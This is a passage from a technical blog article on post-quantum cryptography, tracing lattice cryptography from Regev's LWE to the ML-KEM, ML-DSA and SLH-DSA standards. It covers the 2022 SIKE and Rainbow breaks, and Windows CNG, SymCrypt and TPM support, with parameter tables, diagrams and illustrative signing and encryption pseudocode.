&lt;p&gt;&lt;strong&gt;SIDH and SIKE (2011-2022)&lt;/strong&gt; were the most efficient post-quantum proposal by public-key size. Supersingular Isogeny Diffie-Hellman, introduced by Jao and De Feo in 2011 [@jao-defeo-2011], achieved public keys of roughly 330 bytes at category 1 [@wp-sidh] -- smaller than ML-KEM-512&apos;s 800 bytes. NIST advanced SIKE to the fourth round of evaluation on 5 July 2022 [@nist-pqc-selection-2022]. On 27 July 2022, twenty-two days later, Wouter Castryck and Thomas Decru published &quot;An efficient key recovery attack on SIDH,&quot; recovering SIKEp434&apos;s secret key in about ten minutes on a single CPU core via a torsion-point exploitation of Kani&apos;s reducibility criterion [@castryck-decru-sidh]. The higher-security parameter set SIKEp751 (NIST category 5) fell in roughly three hours on the same hardware. A concurrent paper by Maino and Martindale extended the attack to arbitrary starting curves [@maino-martindale-sidh]. One paper, one month, the entire isogeny lane retired. SIKE is the canonical example of why NIST&apos;s portfolio rests on multiple unrelated hardness assumptions.&lt;/p&gt;

flowchart TD
    PQ[&quot;Post-Quantum Cryptography&quot;]
    PQ --&amp;gt; Lat[&quot;Lattice&lt;br /&gt;(LWE, Module-LWE, NTRU)&quot;]
    PQ --&amp;gt; Code[&quot;Code-based&lt;br /&gt;(Goppa, Quasi-Cyclic)&quot;]
    PQ --&amp;gt; Multi[&quot;Multivariate&lt;br /&gt;(HFE, Rainbow)&quot;]
    PQ --&amp;gt; Hash[&quot;Hash-based&lt;br /&gt;(XMSS, LMS, SPHINCS+)&quot;]
    PQ --&amp;gt; Iso[&quot;Isogeny&lt;br /&gt;(SIDH, SIKE)&quot;]
    Lat --&amp;gt; LatV[&quot;ACTIVE: ML-KEM, ML-DSA, Falcon&quot;]
    Code --&amp;gt; CodeV[&quot;NICHE: HQC, Classic McEliece&quot;]
    Multi --&amp;gt; MultiV[&quot;DEAD: Rainbow broken 2022&quot;]
    Hash --&amp;gt; HashV[&quot;ACTIVE: SLH-DSA, LMS, XMSS&quot;]
    Iso --&amp;gt; IsoV[&quot;DEAD: SIDH/SIKE broken 2022&quot;]

A proof technique, introduced for lattices by Miklos Ajtai in 1996 and refined for LWE by Oded Regev in 2005, that ties the average-case security of a cryptosystem to the worst-case hardness of an underlying lattice problem [@regev-2005]. The reduction says: solving random instances of the cryptosystem at any non-negligible advantage gives an algorithm for the *worst-case* hard problem. RSA has no analogous reduction; the average factoring instance is conjectured hard, but no theorem ties it to worst-case factoring. The lattice reduction is the structural argument for why post-quantum lattice cryptography may be more conservative, in a formal sense, than RSA.
&lt;p&gt;The portfolio lesson lands here, and it is the article&apos;s first aha moment. Post-quantum cryptography is not a single family; it is a &lt;em&gt;portfolio&lt;/em&gt; across multiple hardness assumptions, because each one has been broken at least once during the modern standardisation effort. The Rainbow break and the SIKE break both happened &lt;em&gt;during&lt;/em&gt; the NIST competition, in 2022, on candidates that NIST had advanced for further study. This is why the eventual slate -- ML-KEM (lattice) plus SLH-DSA (hash) -- sits on &lt;em&gt;two structurally unrelated&lt;/em&gt; foundations. A single mathematical break cannot retire the whole programme.&lt;/p&gt;
&lt;p&gt;Lattices survived. But the lattices of 2005 had megabyte-scale public keys, unusable in TLS. How those keys were compressed to kilobytes is the story of the next section.&lt;/p&gt;
&lt;h2&gt;4. The Evolution -- Lattices in Five Generations&lt;/h2&gt;
&lt;p&gt;In 2005, Oded Regev published a paper that gave lattice cryptography the mathematical foundation RSA never had. By 2010, the same idea had been compressed by a factor of &lt;code&gt;n&lt;/code&gt; via the Number Theoretic Transform; by 2015 it had been generalised with a parameter knob that let one base ring serve every security category; by 2024 it was a Federal Information Processing Standard. This section walks the generation-by-generation story of how lattices got from impossible to inevitable.&lt;/p&gt;
&lt;h3&gt;Generation 0 (1976-1994): the classical baseline&lt;/h3&gt;
&lt;p&gt;Diffie-Hellman, RSA, DSA, ECDH, ECDSA. Five primitives over four decades, all on discrete-log-style hardness in one group or another, all retired in one stroke by Shor&apos;s algorithm. The classical baseline is what PQC replaces. Nothing about post-quantum cryptography innovates on the symmetric side; AES and SHA-2 survive with parameter increases.&lt;/p&gt;
&lt;h3&gt;Generation 1 (1996-2009): plural hard problems, mostly impractical&lt;/h3&gt;
&lt;p&gt;Miklos Ajtai&apos;s 1996 STOC paper &quot;Generating Hard Instances of Lattice Problems&quot; introduced the first worst-case-to-average-case reduction for a lattice problem (the Short Integer Solution problem) [@ajtai-1996]. The reduction was a foundational theoretical result; the cryptographic constructions built from it had public keys in the megabytes.&lt;/p&gt;
&lt;p&gt;Nine years later, Oded Regev published &quot;On Lattices, Learning with Errors, Random Linear Codes, and Cryptography&quot; at STOC 2005 [@regev-2005]. The Learning With Errors problem is simple to state.&lt;/p&gt;

Given a uniformly random matrix $A \in \mathbb{Z}_q^{m \times n}$, a secret vector $s \in \mathbb{Z}_q^n$, and a small noise vector $e$ sampled from a Gaussian-like distribution, distinguish the pair $(A, As + e)$ from a uniformly random pair $(A, b)$ where $b$ is uniform in $\mathbb{Z}_q^m$. LWE is conjectured hard for any polynomial-time algorithm classical or quantum; Regev&apos;s theorem ties LWE to the worst-case hardness of approximating shortest-vector problems on $n$-dimensional lattices, via a quantum reduction [@regev-2005].
&lt;p&gt;LWE was the cryptographic breakthrough. The construction was clean, the reduction tied average-case security to worst-case lattice hardness, and the resulting cryptosystem was simple enough that any cryptographer could implement it. But the public key was a full $n \times n$ matrix over $\mathbb{Z}_q$ -- $O(n^2 \log q)$ bits. At the parameter sizes needed for 128-bit security, that meant several megabytes of public key. Unusable in TLS, unusable in X.509, unusable in any deployment that touches the wire.&lt;/p&gt;
&lt;h3&gt;Generation 2 (2010-2017): the ring-LWE and module-LWE compression&lt;/h3&gt;
&lt;p&gt;The compression that made lattices deployable was a single algebraic move. Lift LWE from $\mathbb{Z}_q$ to a polynomial ring. Lyubashevsky, Peikert, and Regev&apos;s 2010 paper &quot;On Ideal Lattices and Learning with Errors over Rings&quot; (eprint 2012/230) introduced Ring-LWE [@lpr-2010-ringlwe]. The underlying ring is $R_q = \mathbb{Z}_q[X]/(X^n + 1)$ for $n$ a power of two; the secret and noise are now polynomials in $R_q$ rather than vectors over $\mathbb{Z}_q$. Multiplying two ring elements becomes a polynomial multiplication, which the Number Theoretic Transform reduces from $O(n^2)$ scalar multiplications to $O(n \log n)$.&lt;/p&gt;

A discrete Fourier transform over a finite field rather than the complex numbers. For a prime $q$ such that $2n$ divides $q - 1$, NTT converts a polynomial $a(X) \in \mathbb{Z}_q[X]/(X^n + 1)$ into its evaluations at the $2n$-th roots of unity in $\mathbb{Z}_q$. Polynomial multiplication then becomes pointwise multiplication of the NTT vectors. NTT is the speedup that compresses Ring-LWE arithmetic from $O(n^2)$ to $O(n \log n)$ and is the reason ML-KEM-768 encapsulates in tens of microseconds on commodity x86-64 [@fips-203-pdf].
&lt;p&gt;Public keys dropped from megabytes to kilobytes. The 2010 lift is the load-bearing intellectual move; everything subsequent is engineering.&lt;/p&gt;
&lt;p&gt;Adeline Langlois and Damien Stehle&apos;s 2012/2015 Module-LWE paper added a parameter knob [@langlois-stehle-modulelwe]. Module-LWE works over $R_q$ rings of &lt;em&gt;fixed&lt;/em&gt; degree $n$ (typically 256 in ML-KEM), but lifts the secret and matrix into module rank $k$: $A$ is a $k \times k$ matrix of ring elements, $s$ is a $k$-vector of ring elements. Now one base ring of degree 256 can serve every NIST security category by varying $k \in {2, 3, 4}$. ML-KEM-512 uses $k = 2$; ML-KEM-768 uses $k = 3$; ML-KEM-1024 uses $k = 4$. The compiler-style metaphor is exact: Ring-LWE was an over-fitted special case, Module-LWE generalises it.&lt;/p&gt;

A generalisation of Learning With Errors over polynomial rings of fixed degree, in which the secret is a $k$-vector of ring elements and the matrix is $k \times k$. Module-LWE inherits the worst-case-to-average-case reduction from Ring-LWE [@langlois-stehle-modulelwe], offers a finer-grained security knob than either LWE or Ring-LWE, and is the underlying hardness assumption of ML-KEM (FIPS 203) and ML-DSA (FIPS 204) [@fips-203-pdf, @fips-204-pdf].
&lt;p&gt;The first TLS deployment of a Ring-LWE key exchange landed in 2014, and Microsoft Research was at the centre of it.&lt;/p&gt;

The BCNS 2014 paper &quot;Post-quantum key exchange for the TLS protocol from the ring learning with errors problem&quot; by Joppe Bos, Craig Costello, Michael Naehrig, and Douglas Stebila (eprint 2014/599) was the first end-to-end TLS implementation of a Ring-LWE key exchange [@bcns-2014]. Two of the four authors -- Costello and Naehrig -- were Microsoft Research Redmond. Two years later, the same Microsoft Research group plus collaborators published Frodo (CCS 2016, eprint 2016/659), the unstructured-LWE conservative fallback design with no ring algebra [@frodo-2016]. Frodo became FrodoKEM in the NIST process; FrodoKEM was selected as a Round-3 alternate but not advanced to standardisation [@frodokem-project]. Microsoft Research&apos;s own retrospective spans this work: &quot;Our PQC effort began in 2014 when we published research on post-quantum algorithms and later quantum cryptanalysis ... we participated in four submissions to the original 2017 NIST PQC call and one submission to the current call. Since 2018 we have been experimenting with verified versions of PQC algorithms and in 2019 Microsoft Research completed testing of an experimental PQC-protected VPN tunnel between Redmond, Washington, and Scotland&quot; [@ms-quantum-safe-blog]. The 2024 FIPS publication did not surprise Microsoft.
&lt;p&gt;Google&apos;s Chrome team deployed the construction in production first. CECPQ1 (&quot;Combined Elliptic-Curve and Post-Quantum 1&quot;) shipped in Chrome Canary in July 2016, combining X25519 with NewHope [@google-cecpq1]. NewHope was a Ring-LWE construction by Alkim, Ducas, Poppelmann, and Schwabe; CECPQ1 ran for several months as an experiment, measured the cost of an extra ~2 KB on each handshake, and was retired. CECPQ2 replaced it with NTRU-HRSS -- the announcement post by Adam Langley names the lineage explicitly (&quot;CECPQ1 was the experiment ... It&apos;s about time for CECPQ2&quot;) and the NTRU-HRSS basis -- and was wound down in 2022 as Chrome migrated to the X25519+Kyber-768 hybrid following NIST&apos;s July 2022 selection [@cloudflare-pq-2024]. The parallel CECPQ2b experiment paired X25519 with SIKE; the Castryck-Decru break that same month retired CECPQ2b along with the entire isogeny lane. The Cloudflare-Microsoft-Google triad has been iterating in production since.&lt;/p&gt;
&lt;h3&gt;Generation 3 (2017-2022): the NIST competition&lt;/h3&gt;
&lt;p&gt;NIST issued the formal call for post-quantum public-key submissions in December 2016. Eighty-two submissions arrived by the November 2017 deadline; sixty-nine were judged complete and proper, advancing into Round 1 (announced December 2017; narrowed to 26 in Round 2, January 2019) [@wp-nist-pqc].The 82-vs-69 discrepancy is a frequent source of confusion in PQC pedagogy. Eighty-two total submissions, sixty-nine deemed &quot;complete and proper&quot; by NIST&apos;s intake review, advanced to Round 1. The remaining thirteen had documentation defects or were withdrawn. Wikipedia&apos;s &quot;NIST Post-Quantum Cryptography Standardization&quot; article spells out both numbers verbatim [@wp-nist-pqc]. The field narrowed to 26 algorithms in Round 2 (January 2019), then to 7 finalists plus 8 alternates in Round 3 (July 2020). NIST IR 8413 (July 2022) is the canonical status report on Round 3 [@nist-ir-8413].&lt;/p&gt;
&lt;p&gt;On 5 July 2022, NIST announced the first four standardisation selections: CRYSTALS-Kyber for key encapsulation, plus CRYSTALS-Dilithium, FALCON, and SPHINCS+ for signatures [@nist-pqc-selection-2022]. Three were lattice schemes; one (SPHINCS+) was hash-based. The same announcement moved Classic McEliece, BIKE, HQC, and SIKE to a fourth round for further evaluation. Twenty-five days later, the Castryck-Decru attack retired SIKE. NIST IR 8545 documents the eventual fourth-round selection of HQC (announced 7 March 2025) over BIKE, with Classic McEliece left as a candidate for niche-use standardisation due to its key size [@nist-hqc-news].&lt;/p&gt;

gantt
    dateFormat YYYY
    axisFormat %Y
    section Algorithm research
    Diffie-Hellman           :milestone, dh, 1976, 0
    Shor&apos;s algorithm         :milestone, shor, 1994, 0
    NTRU                     :milestone, ntru, 1996, 0
    Regev LWE                :milestone, lwe, 2005, 0
    Ring-LWE (LPR)           :milestone, rlwe, 2010, 0
    Module-LWE               :milestone, mlwe, 2012, 0
    BCNS / Frodo / NewHope   :milestone, bcns, 2014, 0
    section NIST process
    PQC call announced       :milestone, call, 2016, 0
    Round 1 (69 candidates)  :milestone, r1, 2017, 0
    Round 2 (26 candidates)  :milestone, r2, 2019, 0
    Round 3 finalists        :milestone, r3, 2020, 0
    Selections + Round 4     :milestone, sel, 2022, 0
    Rainbow + SIKE broken    :milestone, brk, 2022, 0
    FIPS 203 / 204 / 205     :milestone, fips, 2024, 0
    HQC selected             :milestone, hqc, 2025, 0
    section Windows shipping
    SymCrypt v103.5.0 ML-KEM :milestone, sc1, 2024, 0
    Insider Canary CNG PQ    :milestone, can, 2025, 0
    .NET 10 GA               :milestone, dn, 2025, 0
    Schannel X25519MLKEM768  :milestone, sch, 2026, 0
    TPM 2.0 v1.85 PQC        :milestone, tpm, 2026, 0
&lt;h3&gt;Generation 4 (2023-2024): standardisation&lt;/h3&gt;
&lt;p&gt;The draft FIPS standards published in August 2023; the final versions landed on 13 August 2024, when the Secretary of Commerce approved FIPS 203, FIPS 204, and FIPS 205 [@nist-fips-approved-news]. Names changed in the transition: CRYSTALS-Kyber [@crystals-kyber-paper] became Module-Lattice-Based Key-Encapsulation Mechanism (ML-KEM); CRYSTALS-Dilithium became Module-Lattice-Based Digital Signature Algorithm (ML-DSA); SPHINCS+ [@sphincsplus-framework] became Stateless Hash-Based Digital Signature Algorithm (SLH-DSA). The renaming was deliberate; NIST wanted standard names that described the construction rather than the project. Falcon&apos;s standardisation slipped to FIPS 206 in draft, principally because the floating-point Gaussian sampler required for Falcon&apos;s compact signatures is unusually hard to make both fast and constant-time [@nist-pqc-dig-sig].&lt;/p&gt;
&lt;h3&gt;Generation 5 (2024-2026): shipping on Windows&lt;/h3&gt;
&lt;p&gt;SymCrypt v103.5.0 added ML-KEM &quot;per final FIPS 203&quot; along with XMSS and XMSS^MT [@symcrypt-changelog]. Subsequent versions added LMS (v103.6.0), ML-DSA (v103.7.0), FIPS-approved-services indicator (v103.8.0), ML-DSA External-Mu sign/verify (v103.9.0), FIPS CAST plus ML-KEM/ML-DSA keygen pairwise consistency tests (v103.9.1), and Composite ML-KEM (v103.11.0). The Windows Insider Canary channel exposed the CNG identifiers in May 2025 [@ms-pqc-windows-insider]. .NET 10 (GA November 2025) shipped managed types &lt;code&gt;System.Security.Cryptography.MLKem&lt;/code&gt;, &lt;code&gt;MLKemCng&lt;/code&gt;, &lt;code&gt;MLDsa&lt;/code&gt;, &lt;code&gt;MLDsaCng&lt;/code&gt; [@dotnet-10-launch, @dotnet-mlkem, @dotnet-mlkemcng]. Schannel hybrid TLS 1.3 X25519MLKEM768 reached Server 2025 and 24H2 in preview behind Group Policy in early 2026.&lt;/p&gt;
&lt;p&gt;The competition is over. The standards are published. The SymCrypt versions are shipping. We have arrived at the moment where the algorithm internals matter -- because every Windows engineer now writes code against &lt;code&gt;BCRYPT_MLKEM_ALG_HANDLE&lt;/code&gt;, and code that uses an algorithm should know how it works.&lt;/p&gt;
&lt;h2&gt;5. The Breakthrough -- ML-KEM, ML-DSA, SLH-DSA at Engineer Depth&lt;/h2&gt;
&lt;p&gt;Three FIPS standards. Three algorithms. Three Windows API surfaces. Each rests on a different hardness assumption. Each has its own parameter zoo, key sizes, and side-channel surface. This section walks all three at the level a Windows engineer needs to make procurement, audit, and migration decisions.&lt;/p&gt;
&lt;h3&gt;5.1 ML-KEM (FIPS 203) -- the default KEM&lt;/h3&gt;
&lt;p&gt;ML-KEM is the only NIST-finalised key-encapsulation mechanism. It is the encryption primitive of the post-quantum era on Windows. The algebra is Module-LWE / Module-LWR over $R_q = \mathbb{Z}_q[X]/(X^{256} + 1)$ with $q = 3329$ -- a 12-bit prime chosen to make NTT arithmetic fast on 16-bit and 32-bit lanes [@fips-203-pdf]. The base ring has degree 256; the module rank $k$ selects the parameter set.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter set&lt;/th&gt;
&lt;th&gt;$k$&lt;/th&gt;
&lt;th&gt;NIST category&lt;/th&gt;
&lt;th&gt;Encapsulation key (bytes)&lt;/th&gt;
&lt;th&gt;Ciphertext (bytes)&lt;/th&gt;
&lt;th&gt;Shared secret (bytes)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;ML-KEM-512&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;1 (AES-128 equivalent)&lt;/td&gt;
&lt;td&gt;800&lt;/td&gt;
&lt;td&gt;768&lt;/td&gt;
&lt;td&gt;32&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ML-KEM-768&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;3 (AES-192 equivalent)&lt;/td&gt;
&lt;td&gt;1184&lt;/td&gt;
&lt;td&gt;1088&lt;/td&gt;
&lt;td&gt;32&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ML-KEM-1024&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;5 (AES-256 equivalent)&lt;/td&gt;
&lt;td&gt;1568&lt;/td&gt;
&lt;td&gt;1568&lt;/td&gt;
&lt;td&gt;32&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The byte counts in the table are verbatim from the FIPS 203 standard [@fips-203-pdf, @wp-kyber]. Cloudflare&apos;s October 2022 deployment and Schannel&apos;s X25519MLKEM768 both target ML-KEM-768 specifically -- the category-3 sweet spot that survives even an aggressive cryptanalytic improvement against Module-LWE [@cloudflare-pq-for-all, @draft-tls-ecdhe-mlkem]. Apple&apos;s PQ3 splits its parameter selection: ML-KEM-1024 for the initial key exchange and Kyber-768 for the ongoing asymmetric ratchet [@apple-imessage-pq3]. OpenSSH 9.0+ deployed a different post-quantum primitive entirely -- Streamlined NTRU Prime in &lt;code&gt;sntrup761x25519-sha512&lt;/code&gt; [@openssh-9-0] -- and OpenSSH 9.9 (released 19 September 2024) added the ML-KEM-768-based group &lt;code&gt;mlkem768x25519-sha256&lt;/code&gt; available by default alongside it [@openssh-9-9].&lt;/p&gt;

A generic construction that converts an IND-CPA-secure public-key encryption scheme into an IND-CCA2-secure key-encapsulation mechanism. The transform re-encrypts the plaintext during decapsulation and verifies the resulting ciphertext bit-for-bit; any mismatch causes decapsulation to return an implicit-rejection pseudorandom value rather than the real shared secret. ML-KEM wraps an IND-CPA-secure scheme called K-PKE with the FO transform; the FO wrapper is what makes ML-KEM safe to use with long-term keys [@fips-203-pdf].
&lt;p&gt;ML-KEM has three operations: &lt;code&gt;KeyGen&lt;/code&gt; produces $(ek, dk)$; &lt;code&gt;Encaps(ek)&lt;/code&gt; produces $(K, c)$ where $K$ is the 32-byte shared secret and $c$ is the ciphertext; &lt;code&gt;Decaps(dk, c)&lt;/code&gt; recomputes $K$. The CNG surface mirrors this exactly. The canonical Microsoft idiom (from Microsoft Learn&apos;s CNG ML-KEM examples, currently marked prerelease) is &lt;code&gt;BCryptGenerateKeyPair&lt;/code&gt; with the pseudo-handle &lt;code&gt;BCRYPT_MLKEM_ALG_HANDLE&lt;/code&gt;, followed by &lt;code&gt;BCryptSetProperty&lt;/code&gt; setting &lt;code&gt;BCRYPT_PARAMETER_SET_NAME&lt;/code&gt; to &lt;code&gt;BCRYPT_MLKEM_PARAMETER_SET_768&lt;/code&gt;, followed by &lt;code&gt;BCryptFinalizeKeyPair&lt;/code&gt;, followed by &lt;code&gt;BCryptExportKey&lt;/code&gt; to extract the encapsulation key as a &lt;code&gt;BCRYPT_MLKEM_ENCAPSULATION_BLOB&lt;/code&gt; [@cng-mlkem-examples]. The new verbs &lt;code&gt;BCryptEncapsulate&lt;/code&gt; and &lt;code&gt;BCryptDecapsulate&lt;/code&gt; complete the picture; neither existed in CNG before the ML-KEM surface was added.&lt;/p&gt;

sequenceDiagram
    participant C as Client (Windows / Schannel)
    participant S as Server (Cloudflare / IIS)
    C-&amp;gt;&amp;gt;S: ClientHello key_share = X25519 (32B) || ML-KEM-768 ek (1184B)
    Note over S: Generates X25519 keypair
    Note over S: Computes ML-KEM Encaps(ek)
    Note over S: Yields ct and K_pq
    S-&amp;gt;&amp;gt;C: ServerHello key_share = X25519 (32B) || ML-KEM-768 ct (1088B)
    Note over C: Derives ECDH shared secret K_ecdh
    Note over C: Computes ML-KEM Decaps for K_pq
    Note over C,S: HKDF-Extract IKM = K_ecdh concat K_pq
    Note over C,S: Yields TLS 1.3 traffic secrets
&lt;p&gt;The internal construction of ML-KEM combines an IND-CPA-secure public-key encryption scheme called K-PKE with the Fujisaki-Okamoto-Hofheinz transform to produce an IND-CCA2 KEM. K-PKE is a Regev-style encryption with module structure; the encryption is illustrative-grade simple.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// Illustrative ML-KEM K-PKE encryption. // The FIPS 203 standard is the normative source for byte-exact operations. // q = 3329, n = 256, ring R_q = Z_q[X] / (X^n + 1), module rank k in {2, 3, 4}. function kpkeEncrypt(ek: PublicKey, message: number[], seed: Uint8Array) {   const { A, t, k } = ek;           // A is k x k matrix in R_q, t is k-vector in R_q   const r  = sampleSmallCBD(seed, k);     // r:  k-vector, centred binomial noise   const e1 = sampleSmallCBD(seed, k);     // e1: k-vector, fresh noise   const e2 = sampleSmallSingle(seed);     // e2: scalar polynomial, fresh noise   const u = ringMatVecMul(transpose(A), r);   addInPlace(u, e1);                       // u = A^T r + e1   const v = ringDot(t, r);                 // v = t . r   addInPlace(v, e2);                       // v = t.r + e2   const mEncoded = encodeMessage(message); // 256-bit message -&amp;gt; R_q element   addInPlace(v, mEncoded);                 // v += Encode(message)   return { u, v };                          // ciphertext (u in R_q^k, v in R_q) }&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;The IND-CCA2 wrapper that becomes ML-KEM proper is the FO transform: hash the message and randomness into the encapsulation, then re-encrypt during decapsulation and reject if the ciphertext does not match. Decapsulation on a tampered ciphertext returns a pseudorandom shared secret derived from the secret key -- implicit rejection -- rather than an error code that an attacker could observe. This is what gives ML-KEM CCA2 security suitable for static keys in TLS, X.509, and CNG.&lt;/p&gt;
&lt;h3&gt;5.2 ML-DSA (FIPS 204) -- the default lattice signature&lt;/h3&gt;
&lt;p&gt;ML-DSA is the general-purpose lattice signature scheme. Same base ring of degree 256 as ML-KEM, but with a &lt;em&gt;different&lt;/em&gt; prime: $q = 8380417$, a 23-bit prime [@fips-204-pdf]. The disparity is intentional; ML-KEM and ML-DSA do not share keys, so their NTT parameter choices are independently optimised. The construction is Fiat-Shamir-with-aborts over Module-LWE and Module-SIS.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter set&lt;/th&gt;
&lt;th&gt;NIST category&lt;/th&gt;
&lt;th&gt;Public key (bytes)&lt;/th&gt;
&lt;th&gt;Signature (bytes)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;ML-DSA-44&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;1312&lt;/td&gt;
&lt;td&gt;2420&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ML-DSA-65&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1952&lt;/td&gt;
&lt;td&gt;3293&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ML-DSA-87&lt;/td&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;2592&lt;/td&gt;
&lt;td&gt;4595&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Numbers verbatim from FIPS 204 [@fips-204-pdf]. CNSA 2.0 selects ML-DSA-87 specifically as the general-signature algorithm for U.S. National Security Systems [@cnsa20-csa].&lt;/p&gt;

A signature construction in which the prover commits to a masking value, hashes the message and commitment to derive a challenge, computes a response that depends on the secret and the challenge, and *aborts and retries* if the response would leak the secret. The &quot;abort&quot; probability is bounded so signing completes in a small constant expected number of restarts. The technique, due to Lyubashevsky, is the foundation of ML-DSA&apos;s security argument; the rejection-sampling loop is also the source of a measurable timing variance that constant-time implementations must handle carefully [@fips-204-pdf].

flowchart TD
    Start[&quot;Begin sign(message, sk)&quot;] --&amp;gt; Sample[&quot;Sample masking vector y (small ball)&quot;]
    Sample --&amp;gt; Commit[&quot;Compute w = Ay in R_q&quot;]
    Commit --&amp;gt; Hash[&quot;c = H(message || HighBits(w))&quot;]
    Hash --&amp;gt; Resp[&quot;Compute response z = y + c*s_1&quot;]
    Resp --&amp;gt; Check{&quot;||z||_inf &amp;lt; bound?&lt;br /&gt;||LowBits(w - c*s_2)||_inf &amp;lt; bound?&quot;}
    Check --&amp;gt;|no| Sample
    Check --&amp;gt;|yes| Out[&quot;Return signature (z, c, h)&quot;]
&lt;p&gt;ML-DSA-87&apos;s 4595-byte signature is the bottom-of-stack constraint that drives every TPM and Pluton roadmap [@fips-204-pdf]. The default TPM 2.0 command and response buffers, fixed by historical compatibility decisions, are 4096 bytes. ML-DSA-65&apos;s 3293-byte signature fits; ML-DSA-87&apos;s 4595-byte signature does not. The TCG TPM 2.0 Library Specification v1.85 (March 2026) introduces a streaming Sign/Verify family and ML-KEM &lt;code&gt;Encapsulate&lt;/code&gt;/&lt;code&gt;Decapsulate&lt;/code&gt; opcodes that resolve the overflow; the full opcode inventory and the new &lt;code&gt;TPM2B_KEM_CIPHERTEXT&lt;/code&gt; / &lt;code&gt;TPM2B_SHARED_SECRET&lt;/code&gt; / &lt;code&gt;TPM_ST_MESSAGE_VERIFIED&lt;/code&gt; structures are catalogued in Section 9.1 [@wolfssl-wolftpm-v185]. Until v1.85 chips ship in retail volume, ML-DSA-87 cannot live on a commodity TPM. Cross-reference the &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM&lt;/a&gt; and &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Pluton&lt;/a&gt; sibling articles for the silicon-side mechanics.Pluton&apos;s firmware-update agility -- the firmware ships through the existing Microsoft Update channel -- is the reason Pluton can move on PQ adoption faster than discrete TPM 2.0 chips, whose firmware updates depend on each TPM vendor&apos;s release cadence. The cross-reference to the Pluton sibling article in this series spells out the firmware-update mechanism in detail [@ms-quantum-safe-blog].&lt;/p&gt;
&lt;p&gt;The CNG surface mirrors ML-KEM&apos;s idiom with the signature primitives. &lt;code&gt;BCryptOpenAlgorithmProvider&lt;/code&gt; with &lt;code&gt;BCRYPT_MLDSA_ALGORITHM = L&quot;ML-DSA&quot;&lt;/code&gt; and &lt;code&gt;MS_PRIMITIVE_PROVIDER&lt;/code&gt; returns a handle; &lt;code&gt;BCryptSetProperty&lt;/code&gt; selects &lt;code&gt;BCRYPT_MLDSA_PARAMETER_SET_44&lt;/code&gt;, &lt;code&gt;_65&lt;/code&gt;, or &lt;code&gt;_87&lt;/code&gt;; &lt;code&gt;BCryptGenerateKeyPair&lt;/code&gt; plus &lt;code&gt;BCryptFinalizeKeyPair&lt;/code&gt; produces the keypair; key blobs are &lt;code&gt;BCRYPT_PQDSA_PUBLIC_KEY_BLOB&lt;/code&gt; and &lt;code&gt;BCRYPT_PQDSA_PRIVATE_KEY_BLOB&lt;/code&gt;; signing and verification go through &lt;code&gt;BCryptSignHash&lt;/code&gt; and &lt;code&gt;BCryptVerifySignature&lt;/code&gt; with a &lt;code&gt;BCRYPT_PQDSA_PADDING_INFO&lt;/code&gt; struct that selects pure-mode or pre-hash-mode (External-Mu, per FIPS 204&apos;s HashML-DSA variants) and carries an optional context string [@cng-mldsa-examples].&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// Illustrative ML-DSA signing. // Constants gamma1, gamma2, beta are parameter-set dependent. function mlDsaSign(message: Uint8Array, sk: SecretKey): Signature {   const { A, s1, s2, t0 } = sk;   let attempt = 0;   while (attempt &amp;lt; 1000) {     attempt++;     const y  = sampleMaskingVector(gamma1);     // y in R_q^l, ||y||_inf &amp;lt; gamma1     const w  = ringMatVecMul(A, y);              // w = A*y in R_q^k     const w1 = highBits(w, 2 * gamma2);     const c  = hashToChallenge(message, w1);     // c in B_tau     const z  = addVec(y, scalarMul(c, s1));      // z = y + c*s1     if (infNorm(z) &amp;gt;= gamma1 - beta) continue;   // reject if response too large     const r0 = lowBits(subVec(w, scalarMul(c, s2)), 2 * gamma2);     if (infNorm(r0) &amp;gt;= gamma2 - beta) continue;  // reject if low bits leak     return { z, c, h: makeHint(t0, c, w) };   }   throw new Error(&quot;ML-DSA signing exceeded attempt budget (statistically improbable)&quot;); }&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;ML-DSA sign time on x86-64 is in the low single-digit milliseconds; verify time is in the hundreds of microseconds. The rejection-sampling loop creates a measurable variance in sign-time -- a side channel that secret-key recovery exploits if the loop count, branch, or memory-access pattern leak.&lt;/p&gt;
&lt;h3&gt;5.3 SLH-DSA (FIPS 205) -- the conservative hash-based signature&lt;/h3&gt;
&lt;p&gt;SLH-DSA&apos;s security rests on hash-function security alone. No lattice. No code. No multivariate. No isogeny. Just preimage resistance and collision resistance of an underlying hash function (SHA-2 or SHAKE). If every algebraic post-quantum assumption breaks tomorrow, hash-based signatures still hold. The cost is signature size and signing time [@fips-205-pdf].&lt;/p&gt;
